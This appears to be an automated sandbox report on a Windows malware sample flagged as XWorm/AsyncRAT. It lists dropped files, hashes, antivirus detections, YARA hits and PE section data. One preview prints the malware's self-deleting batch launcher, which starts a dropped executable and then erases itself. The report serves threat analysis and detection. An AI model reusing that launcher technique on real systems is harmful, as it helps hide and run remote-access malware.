                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Users\user\Desktop\cougif6lqM.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1088
                                    Entropy (8bit):5.389928136181357
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6Kh6+84xp3/Vcll1qE4GIs0E4KD:MxHKQwYHKGSI6o6+vxp3/ell1qHGIs0K
                                    MD5:7F03B15120D277413D7C08047184C8F5
                                    SHA1:0A6EEC1B9E6BB8FF846D21F7575E78B29C42A00F
                                    SHA-256:18E01DE8BB5C3C111EA89C01A4D28F1834BB02E26C0ECD86D8CCAB3835C79B2C
                                    SHA-512:8995C0BEA34B69FFEEE03FBB332223AB95502938A4789E64CBE8329F596E43C74676FF4550AD4F8506AAF6B955E6F8A5BDEAF1A5B6D71275D265DCE2D5478754
                                    Malicious:true
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1281
                                    Entropy (8bit):5.370111951859942
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1830
                                    Entropy (8bit):5.3661116947161815
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                                    MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                                    SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                                    SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                                    SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllulbnolz:NllUc
                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                    Malicious:false
                                    Preview:@...e................................................@..........
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):225
                                    Entropy (8bit):5.259747938023626
                                    Encrypted:false
                                    SSDEEP:6:hITg3Nou11r+DE1WD5TcL+KBTuibfDA0SKOZG1qLTwi23f/h:OTg9YDEoTdKBTuivNswZx
                                    MD5:876CE5904FFB2069A04FA30DB6431AB9
                                    SHA1:A1DFC74A30922CAC4207A4977909FB6B01B2E28E
                                    SHA-256:991DE81AB902A85256ED98E1EBFF204DA30475FCD266D94502A2A9AE8A5E88DC
                                    SHA-512:BE66AF9371D453F3CB5EFA6FDCAEE2BDFA84F964BCFABC5867B5F8A34F1317A3D26451D6B3AD1AD756F4106DD81BBC30E005B7CF315B696F6C58D4127891B91C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8o9UezPTg6.bat"
                                    Process:C:\Users\user\Desktop\cougif6lqM.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1588999
                                    Entropy (8bit):6.987851842831063
                                    Encrypted:false
                                    SSDEEP:49152:UbA30EhwsMc3xHulstzQkl2wRvJ21nnwY:UbAisMCYdkfRJ2RwY
                                    MD5:81A0B6CE5163BE692566FFA70F8E9839
                                    SHA1:342D49B98D08F79B5A41682231C79ED0E3403B5B
                                    SHA-256:86C4DB18169DD82595BA107500CC12EFAB51DE2F52B62168303ACF58C1A973A8
                                    SHA-512:C130051EE387BDFDDBB0F82D79847F188DD340C9B3A5D9D48BB8D02DAED743C5318DAFD3B8CEDB841CAB62EE9F27DF60EED6ED1A4DD8726AC433CD268653E69C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 70%
                                     • Antivirus: Virustotal, Detection: 59%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\cougif6lqM.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):151040
                                    Entropy (8bit):7.524350777165646
                                    Encrypted:false
                                    SSDEEP:3072:XzVO5Hwt4nbrdu6BgOOUb7JoWzHdcIpR49mp83n7Se/suQTvYag:XzVOBw+nbdJ7rzdcaomp8X7fs7vYa
                                    MD5:2F969595E0DD360ECD52126BF5ECE5E5
                                    SHA1:3560779C522DE4D8C411EEC8D9AEAE9E2EBCC259
                                    SHA-256:3C3A282F4B43F7B8409D4F4E566EE2FDA7D0EF6E60675CF43FA2896C81F5BD6C
                                    SHA-512:0553AD101B6A83DCE08D4D6EBD413FA0C19B2A7F3F67C54CB0FEC2EC820A52F9BC224A0EA958A0539542869433D2CA5404E6BC01278CDC7BD6903945C279A01F
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 92%
                                    • Antivirus: Virustotal, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................p......N.... ........@.. ....................................@.....................................K........m........................................................................... ............... ..H............text...T.... ...................... ..`.rsrc....m.......n..................@..@.reloc...............L..............@..B................0.......H.......0Y.........&.....................................................(....*.r...p*. J...*..(....*.rq..p*. ,-..*.s.........s.........s.........s.........*.r"..p*. S...*.r`..p*. .t..*.r...p*. /6..*.r...p*. /?..*.r...p*. &m..*..((...*.r2..p*. r.d.*.rp..p*. ...*&(....&+.*.+5sX... .... .'..oY...(*...~....-.(D...(6...~....oZ...&.-.*.rt..p*. ..i.*.r...p*. X...*.r...p*. *p{.*.r...p*. .'..*.rl..p*..............j..................s[..............*"(F...+.*:.t....(A...+.*.r...p*.
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.243856189774723
                                    Encrypted:false
                                    SSDEEP:3:uEtF1wTi:uAui
                                    MD5:010C8C1B8C76C9CCC362580CF27864CD
                                    SHA1:21397C6D054E7D11DA05E8BD889ABB6964B9D88D
                                    SHA-256:02DE83B6B222977E3B42F09640F9854DCD1ABF0C2F5597A5E8ACB32D8F75E04C
                                    SHA-512:E29F82FD123ED16D9E3E28E9FF623133AC2BB3776E90F85F309BC2E21F9ECF3B2610213C93C1E8578D7084AD10A6B1E44392CEC877EB76B9A6CA18097B0743E2
                                    Malicious:false
                                    Preview:P7fUkZhoGGkmrN1Nvl3dPU6eb
                                    Process:C:\Users\user\AppData\Local\Temp\javaclient.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 6 08:51:55 2024, mtime=Tue Aug 6 08:51:56 2024, atime=Tue Aug 6 08:51:55 2024, length=151040, window=hide
                                    Category:dropped
                                    Size (bytes):1068
                                    Entropy (8bit):4.999962112570021
                                    Encrypted:false
                                    SSDEEP:24:8PxfPHREgKGgXFAvwZCkR487PqwOqygm:8Px3HR2evwZCq48tLyg
                                    MD5:B3033D0D23BAC1D95B1A4388D7B5635F
                                    SHA1:DAB086EF127928D20C7BC22C7F113C4F658BC2F7
                                    SHA-256:2E400F0CFE4C0726829F1442499658312F6F38470E26943360DA3777A5988F7C
                                    SHA-512:BA3D5E02B4AC06C63A737403F530146F79E294055DB75A133030A8E395D258BB89FB586A353AC1B0530C4FD50D3624B764FDBC24A39C9BC18054D085190CBEE6
                                    Malicious:false
                                    Preview:L..................F.... ....f.E.......E.....f.E.....N........................:..DG..Yr?.D..U..k0.&...&.......bBDj....yoG....1.MP........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.YzN..........................=...A.p.p.D.a.t.a...B.P.1......YxN..Local.<......EWsG.YzN.........................=...L.o.c.a.l.....N.1......Y.N..Temp..:......EWsG.Y.N..........................z..T.e.m.p.....j.2..N...Y|N .JAVACL~1.EXE..N.......Y|N.Y|N....^.....................&_..j.a.v.a.c.l.i.e.n.t...e.x.e.......^...............-.......]...................C:\Users\user\AppData\Local\Temp\javaclient.exe..+.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.j.a.v.a.c.l.i.e.n.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......549163...........hT..CrF.f4... ...E._c...,...E...hT..CrF.f4... ...E._c...,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3......
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (417), with no line terminators
                                    Category:dropped
                                    Size (bytes):417
                                    Entropy (8bit):5.847916816232214
                                    Encrypted:false
                                    SSDEEP:6:BGKuHT34EFZQSd04zJN+bHWRE+qmjqOOu48qpF2LjTMmGJoLoKzmQpPI6Tdt30C:B5ub4EFZQSd049NSLmjp0+gdKiE9z3J
                                    MD5:47B92548458745131A59A88C71504772
                                    SHA1:A2E22A136B8FA96857FC897A08A75C9F64E5607F
                                    SHA-256:18D7593AD477EF0458CE5D2475BC8998401E855C21E2420557614C8265F5DF86
                                    SHA-512:8F94932C6B061AB407698C646B5DF0B92FB15D15DD6B921CCFD99DF622DDF5286037F9A8156322FC394F46120D8517EAC4521EA49D81098D485B621BC4713301
                                    Malicious:false
                                    Preview:mTO7y9yVBz88PjEoKfQolAPV8Id6x847WlZI42CTjjU8Ko6w8m1M0NymD29pg1hC4AloK6uSd6EBpRLUMq7LHsHJwxEB3WxrCREJCRmC1js4Ix6wrpdz4W5L3c1W1tZGIX9YMBR4E5Ti9NA90RUO38xpV2QkaPKIJmvvyijpXiu9DXLqb2gjZLNKjTCUvrezuKYXbPLSso0UNxl7qkJhtkt8ZkLefP3qD5O29yOLrN1uU26vsEnLh6GJbZ81EqwcuJRSjs82V70fs8ogoZwamsIGyFbkzXHAbZAKknM9GuzkFladvbMo4V0CBKedRYD8z0ET8d5AMwU22hANo7zXKdGFj8JaJtssq1vPhGfRgMbHB8JdJQzUjqyWt8uAUf1dEmLBwvqhch18B8DkypR24YJACZfiWf6AV
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.996846244012986
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:cougif6lqM.exe
                                    File size:1'265'664 bytes
                                    MD5:2bbc8212c548dcb848224a882b32492a
                                    SHA1:d056d925ed8284c3b41e4bd2905e6e4cbbd56d3b
                                    SHA256:4b0446befa42f4a40fd06635aaa72fb34dfbaa7575fb1f811df6f4fad90f53b4
                                    SHA512:8340eaa4607b155b817481e6cc0211b37ee05b9cec90a9b577bfa93929496b203aed086235b2936fac5a3a21e0736711a5f39fe6e480243a0d738819b8e390ce
                                    SSDEEP:24576:VIY/wWfmHeEhb0z4iUiKKRHVtrbuvrFHUWiNVuGZxwiRQiJibnniokbiZpOUYa:VImmSzFJ1huTWv3uGZ2iRPJibnniopYa
                                    TLSH:904533D38C59859BFE1DBD304D4A315969E54DE80D88CFA89D4FAD098FFE8202A54F2C
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................p......^.... ........@.. ....................................@................................
                                    Icon Hash:176751b1b1546917
                                    Entrypoint:0x51fd5e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66AD0DCE [Fri Aug 2 16:48:14 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11fd10 | 0x4b | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x120000 | 0x16de8 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x138000 | 0xc | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x2000 | 0x11dd64 | 0x11de00 | 7cf9d0c7f951d98a1427706125733750 | False | 0.9969537398885002 | data | 7.998330200111187 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0x120000 | 0x16de8 | 0x16e00 | eb57413793246479baadebb2ab570faa | False | 0.9925503756830601 | data | 7.9574797382340545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x138000 | 0xc | 0x200 | 5b662fac47906c0e4758c7e2b95470ba | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x120130 | 0x16852 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9991110340192103
